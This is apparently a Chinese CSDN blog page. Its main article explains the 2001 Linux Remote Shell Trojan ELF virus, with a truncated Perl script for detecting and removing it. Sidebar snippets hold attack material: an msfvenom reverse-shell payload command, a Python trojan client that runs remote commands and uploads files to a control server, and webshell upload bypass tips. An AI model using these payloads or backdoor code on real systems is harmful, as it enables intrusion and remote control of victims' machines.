远程shell特洛伊木马病毒

最新推荐文章于 2024-08-31 18:23:24 发布
最新推荐文章于 2024-08-31 18:23:24 发布
阅读量2.2k 收藏 4
点赞数
CC 4.0 BY-SA版权
分类专栏: 黑客技术 文章标签: shell fp header file linux makefile
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/ucshng/article/details/1629871
本文详细介绍了名为“远程shell特洛伊木马(Remote Shell Trojan,RST)”的Linux病毒,该病毒能够感染ELF格式的二进制文件并创建后门。文章提供了病毒的工作原理、传播方式以及可能的来源。为防止病毒扩散,提出了通过增加ELF文件正文段大小来免疫病毒的解决方案,并给出了用于检测和清除RST的Perl脚本和C代码。建议所有Linux用户运行检测程序以检查和保护系统。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

                

LinuxAid

综述

  2001年9月5日,Qualys发布了一个关于基于Linux病毒的安全报警。这个病毒叫作"远程shell特洛伊木马(Remote Shell Trojan)",攻击Linux ELF格式的二进制可执行文件。它具有复制自己的能力:当被运行时,它就会感染所有/bin目录和当前目录下的所有二进制文件。除此之外,这个病毒还产生一个进程,在5503 UDP端口上监听。当这个进程收到一个特制的报文之后,就通过一个系统调用连接到源地址。

细节

  通常,在UNIX系统中病毒不算是一种真正的威胁。一个病毒工作在普通用户权限下的病毒是不能感染没有写权限的二进制文件的。不过每次执行被感染的可执行文件,它就会感染当前目录下的二进制可执行文件,因此还是有一定的威胁的。一旦在root权限下,不小心执行了被病毒感染的文件,它就会感染这个/bin目录下的文件。一旦执行了象ls之类常用的系统命令,当前目录下的所有目录中的二进制可执行文件都会被感染。攻击者还可以通过RST的后门进程获得更高的权限。

来源

  RST是处于研究目的开发的,只在内部使用。研究它的目标是分析如何使病毒在非root权限条件下,影响通常的Linux工作环境。然而,事情却并没有按照研究人员设想的方向发展。一个被感染的二进制可执行文件意外地把这个病毒泄露出实验室。

  现在最关心的问题是如何阻止这个病毒的传播,以及尽可能地从被感染的主机中清除这个病毒。现在公众还不清楚发送到后门进程的报文格式。然而,将来通过逆向工程,人们可以获得这些技术细节。

解决方案

  最好能够使二进制可执行文件将来能够具有对RST的免疫力。把ELF文件正文段增加4096字节,是正文段和数据段之间的空洞(hole)消失,可以提高系统对RST病毒的免疫力。采取了这种措施以后,RST病毒就没有空间在二进制可执行文件中写入自身的代码了。

  这段清除病毒的代码非常简单易用。用户能够决定是否递归地自动检测清除RST病毒。或者对二进制可执行文件一个一个地使用这个清除程序,在这种模式下,系统管理者可以知道二进制可执行文件是否感染,是否具有免疫能力。

  清除程序的简单用法:

% perl Recurse.pl remove

结论

  再次建议所有使用Linux系统的人运行这个检测程序检查系统是否被感染。即使系统没有被感染,也应该采取措施使系统具有免疫能力。只有这样才可以使系统免受感染。

代码

Recurse.pl


#!/usr/bin/perl

use strict;

sub RecursiveDeinfect($);
my $path_to_cleaner = "./kill";
my $options_to_cleaner = "";
my $verbose;

if($ARGV[0] eq "-v") { $verbose = shift; }

$_ = $ARGV[0];
if(/detect/) {
$options_to_cleaner = "1";
print "Recursively detecting trojan starting in: ", $ARGV[1]' '"/", "
";
} elsif(/remove/) {
$options_to_cleaner = "2";
print "Recursively removing trojan starting in: ", $ARGV[1]' '"/", "
";
} elsif(/immune/) {
$options_to_cleaner = "4";
print "Recursively making all binaries starting in: ", $ARGV[1]' '"/", "immune
";
} else {
print "usage: $0 [-v] mode [startdir]
".
"where mode is one of the following:
".
" detect : Recursively detect trojan
".
" remove : Recursively remove trojan if trojan is present.
".
" immune : Recursively remove trojan if trojan is present.
".
" Make all innocent binaries immune for future infection
".
"The default startdir is /
";
exit(0);
}


RecursiveDeinfect($ARGV[1]' '"/");

sub RecursiveDeinfect($) {
my $startdir = shift;
my $filename;
my $ret;

return unless(opendir(my $DH, $startdir));

print "Checking $startdir for infected binaries..
" if($verbose);

while($filename = readdir($DH)) {
next if($filename eq "." or $filename eq "..");
next if(-l "$startdir/$filename");
stat("$startdir/$filename");
RecursiveDeinfect("$startdir/$filename") && next if(-d _);
next unless(-f _ && -x _);
$ret = qx($path_to_cleaner $options_to_clean

最低0.47元/天 解锁文章

200万优质内容无限畅学
9、网络安全中的恶意代码:特洛伊木马、后门、病毒和蠕虫深度解析
pytorch8learner的博客
07-17 8
本文深入解析了网络安全中的常见恶意代码,包括特洛伊木马、后门、病毒和蠕虫,详细介绍了它们的工作原理、传播方式以及防范对策。同时提供了相关的检测工具和安全最佳实践,帮助读者提升系统和数据的安全性。
[网络安全自学篇] 二十五.Web安全学习路线及木马、病毒和防御初探
热门推荐
杨秀璋的专栏
11-12 3万+
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了分享机器学习在安全领域的应用,并复现一个基于机器学习(逻辑回归)的恶意请求识别。这篇文章简单叙述了Web安全学习路线,并实现了最简单的木马和病毒代码,希望对读者有所帮助。
特洛伊木马:现代网络安全的隐形威胁
weixin_48579910的博客
08-16 2063
特洛伊木马是一种伪装成合法软件或文件的恶意程序。攻击者利用这种伪装,使受害者在不知情的情况下主动安装或运行木马,从而为攻击者打开了进入目标系统的大门。与病毒不同,木马并不会自我复制,而是通过社会工程学等手段诱使用户下载和执行。特洛伊木马虽然是网络世界中的“老兵”,但其隐蔽性和多样性使得它至今仍然是网络安全的一大威胁。了解木马的工作原理和危害,并采取适当的防范措施,可以帮助我们在数字化生活中更加安全地航行。
远程管理特洛伊木马(RAT)病毒
E网无涯的专栏
08-13 3231
远程管理特洛伊木马(RAT)病毒 RATs   The world of malicious software is often divided into two types: viral and nonviral. Viruses are little bits of code that are buried in other codes. When the “host” codes a
Python特洛伊木马病毒程序设计(加强版)(五)
qq_36901667的博客
08-31 1710
由于我的更新需要时间,所以我把整本书都以word的方式保存下来了。可以通过以下链接学习,如有不对的章节问题可以留言,如果图片不是特别清晰的话可能是梯子加载慢导致不清楚,需要可以自行留言,百度网盘以设置永久有效,失效也可以留言,我会更换链接链接:https://pan.baidu.com/s/1-3dd0IjQY9ygnVAvex5ZkQ提取码:2525。
特洛伊木马服务器源代码
Uncommon的专栏
01-19 4183
特洛伊木马服务器源代码(C#)作者:wgscd引自:http://www.putfly.com/show.aspx?id=229&cid=13 http://www.putfly.com/show.aspx?ID=229&cid=13&page=2 using System;using System.Drawing;using System.Collections;using Sy
特洛伊木马服务器源代码(C#)
wgscd blog
12-22 940
特洛伊木马服务器//wgscd 2004-12  QQ:153964481using System;using System.Drawing;using System.Collections;using System.ComponentModel;using System.Windows.Forms;using System.Data;using System.IO;using System.Ne
特洛伊木马病毒代码
03-19
好的,我现在需要处理用户关于特洛伊木马病毒的查询。用户想了解其实现原理、源码以及分析相关的安全研究内容。首先,我要根据提供的引用内容来寻找相关信息。 查看引用[2],里面提到外壳病毒将自身附在正常程序的...
【新星计划】你真的了解计算机病毒吗?
静Yu的博客
05-25 5992
常常听说计算机病毒,但你真的了解它们吗?你知道它们长什么样子,如何抵御吗?今天由我来带你深入了解一下。
一句话木马拿Shell与菜刀原理
悦分享
07-12 1953
1. 直接上传asp asa jsp cer php aspx htr cdx 格式的木马,不行就加个空格或是利用IIS6.0解析漏洞,常见格式:1.asp;1.jpg 或 1.asp;.jpg 或 1.asp;jpg2. 有时上传图片格式的木马,居然被程序检测拦截了,右键记事本打开木马,在代码最前面加上gif89a,再数据库备份备份成asp格式的木马拿下shell。3. 上传图片格式木马,复制地址到数据库备份备份成asp格式木马,有时不成功的话,就利用IIs6.0解析漏洞,格式:1.asp;
IP:使用Termux获取有关受害者的信息的工具
05-08
关于IP工具: IP是一个简单的python脚本,可用于IP查找和获取目标IP的信息。 此工具可在根目录为Android的设备和非根目录为Android的设备上使用。 IP适用于: Termux Linux 安装: 首先更新您的环境并安装python2 / 3和git并请求库。 $ apt-get update -y $ apt-get upgrade -y $ pkg install python -y $ pkg install python2 -y $ pkg install git -y $ pip install requests 现在克隆存储库并进入它。 $ git clone https://github.com/yezz123/IP $ cd IP $ python IP.py -h 用法 : 您可以使用-h获得帮助,您也可以通过以下方式直接运行它: $ p
SHELL病毒简介
weixin_30788731的博客
08-07 682
SHELL病毒简介 作者:watercloud 1. 前言 说起病毒总有点神秘的味道,想起以前用汇编编写第一个dos病毒时是那么的痛苦从开始有设想到完成花了3个多月,而且写的也是乱七八糟,最近突发奇想不就是感染其他文件,传播自己吗,用shell写一个病毒且不是非常简单,于是顺手写了如下这么一个小脚本,功能就是感染其他shell程序。 这个程序在现实意义不大,但对于形象的理解病毒传播机制还是...
特洛伊木马脚本linux,手动查杀特洛伊木马
weixin_42348363的博客
04-30 1091
首先也是最重要的,重新启动电脑到安全模式下,让所有文件都可见。然后进入到C:看看根目录是否存在不熟悉的文件,如果有,且日期为发现中毒现象当天,则删除之。接着到c:\windows,首先按照修改时间顺序排列图标,查看最下面的文件,如果发现有当天新建的文件,且为没有见过的删除之。再进system32 同样按照修改时间顺序排列图标,查看最下面的文件,如果发现有当天新建的文件,且扩展名明显有问题的,比如“...
【网络攻防原理与技术】第6章:特洛伊木马
Godam
06-06 2414
恶意代码指在不为人知的情况下侵入用户的计算机系统,破坏系统、网络、信息的保密性、完整性和可用性的程序或代码。与正常代码相比,具有非授权性、破坏性等特点。在计算机程序中插⼊的破坏计算机功能并能⾃我复制的⼀组程序代码。依 附于正常的软件或者⽂件中。不能独⽴运⾏。主要表现(特点):传染性、潜伏性、可触发性、寄生性、非授权性、破坏性计算机病毒的结构:通过计算机⽹络⾃我复制,消耗系统资源和⽹络资源的程序有以下几个模块:指⼀种与远程计算机建⽴连接,使远程计算机能够通过⽹络控制本地计算 机的程序。分为以下几类:⽊⻢体系结
特洛伊木马源攻击
qq_53460654的博客
11-19 1170
L3HCTF的一道题 当时沉迷于什么什么杯中,所以没怎么打 现在来记录一下 攻击原理 cve-2021-42574 <?php error_reporting(0); if ("admin" == $_GET[username] & ‮⁦ + !!⁩⁦ & "‮⁦CTF⁩⁦l3hctf" == $_GET[‮⁦L3H⁩⁦password]) { //Welcome to include "flag.php"; echo $flag; } show_source(__FI
清除Linux挖矿病毒
三少
03-21 2130
今天上服务器发现特别卡,有点奇怪,也没安装什么软件,况且昨天还是好好的。 top一下,不看不知道,一看吓一跳,有几个莫名的进程,CPU达到了200%。 查了下资料,才发现是被人利用挖矿了。 不过不要急,先把相关进程kill掉 然后进/etc里面查看相关文件 大概就是networkservice,sysupdate,sysupdates,config.json,sysguard这几个 注意,先用c...
祭----------------一次查杀linux木马的经历
Stephen.G
02-19 1352
症状表现: 公司内部网络有一天突然开始卡顿,有几个应用特别慢。网络人员查网络,发现有一台机子在大量的发送数据,大概每秒百兆这样子。 -------------------------------------------华丽丽的分割线----------------------------------------------------- 查找原因: 安装iftop: 由于那台机子没有装i
【渗透实战】木马免杀
zkaqlaoniao的博客
11-14 2989
base64 sgn编码。
termux怎么生成木马_msfvenom 木马生成(常用)
weixin_39622901的博客
12-21 941
Linuxmsfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elfWindowsmsfvenom -p windows/meterpreter/reverse_tcp LHOST= ...
木马病毒源代码
最新发布
04-22
### 木马病毒源代码的学习与分析 对于木马病毒的研究,尤其是其源代码的分析和学习,可以从以下几个方面入手: #### 1. **理解木马的基本原理** 木马是一种伪装成合法软件的恶意程序,通常通过欺骗手段让用户执行。它的主要特点是不具有自我复制能力,而是依赖于用户的操作来传播[^1]。木马的核心功能在于隐藏自身的存在并实现特定目标,例如窃取敏感数据、安装后门或提供远程访问权限。 #### 2. **获取安全可靠的资源** 由于木马属于恶意软件,直接下载或运行未知来源的木马源代码可能带来风险。建议从官方授权的安全研究平台上获取样本,例如 Malware-Library 提供了一个用于跨平台分析的恶意软件库[^1]。这些资源经过严格筛选,适合学术研究和技术开发人员使用。 #### 3. **编程技能的要求** 如果计划深入研究木马的工作机制,则需要具备一定的编程基础。特别是 Python 编程语言因其简洁性和强大的第三方库支持,在网络安全领域应用广泛。在尝试阅读或编写任何类型的恶意软件代码前,请确保已掌握 Python 的基本语法以及网络通信等相关知识[^2]。 #### 4. **实际案例解析** 以下是基于 Python 实现的一个简单模拟木马客户端连接服务器端脚本的例子(仅作教学用途),展示了如何建立一个简单的 C&C (Command and Control) 连接: ```python import socket def connect_to_server(ip, port): try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ip, port)) while True: command = s.recv(1024).decode('utf-8') if 'terminate' in command: s.close() break elif 'grab' in command: grab, path = command.split('*') with open(path, 'rb') as f: file_data = f.read(1024) while file_data: s.send(file_data) file_data = f.read(1024) s.send(b'DONE') else: CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) s.send(CMD.stdout.read()) s.send(CMD.stderr.read()) except Exception as e: print(f"Error: {e}") if __name__ == "__main__": connect_to_server("localhost", 9999) ``` 此代码片段展示了一种非常基础的形式化概念,并未包含真实世界中的复杂加密或其他规避检测技术。请注意此类实验应在隔离环境中完成以防止意外损害发生。 #### 5. **法律合规性提醒** 无论出于何种目的接触木马相关材料都需遵循当地法律法规规定;未经授权擅自制作、分发或者利用此类工具侵犯他人隐私均属违法行为应予杜绝。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值